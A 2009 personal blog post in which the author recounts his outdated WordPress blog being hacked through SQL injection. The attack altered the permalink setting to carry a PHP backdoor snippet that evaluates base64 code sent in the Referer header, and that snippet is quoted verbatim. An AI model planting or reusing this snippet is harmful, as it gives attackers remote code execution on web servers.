Martin @ Blog

So, if anybody is visiting this weblog (probably that aren’t many people anymore, partly because I didn’t post anything recently…) they definitely noticed that I was a victim of one of the many exploits that are available for Wordpress weblogs. The frontpage looked alright, but if one tried to view a single post or clicked some random link on my weblog, the page didn’t work. Of course, I was running an old version of Wordpress (2.5 actually…).

After some quick research, it seems there was a bug in Wordpress which made it possible to alter the database using SQL injection. I was victim of a widely available exploit which changed the permalink URL’s to something ending with %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/. This was done by changing the permalink option of Wordpress, which appends this snippet to every URL.

It is quite obvious what it does: everything in the HTTP_REFERER header is base64_decoded and evaluated. So, anybody could execute PHP code on my server by adding it to the referer header (which is very simple).

Many reports by victims of this hack have additional administrators for their blog. Fortunately, that was not the case with my blog.

This is the first time in my life I was subject to hackers or something like that.

More information on how to deal with this hack can be found on the weblog Journey Etc..

By the way, I have to say that the new admin interface that come with Wordpress 2.8.4 is very nice. It is definitely an improvement over the old one (of which the source code also wasn’t very nice..).

Tags: hacked, Wordpress

This entry was posted on Saturday, October 10th, 2009 at 13:33 and is filed under English, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.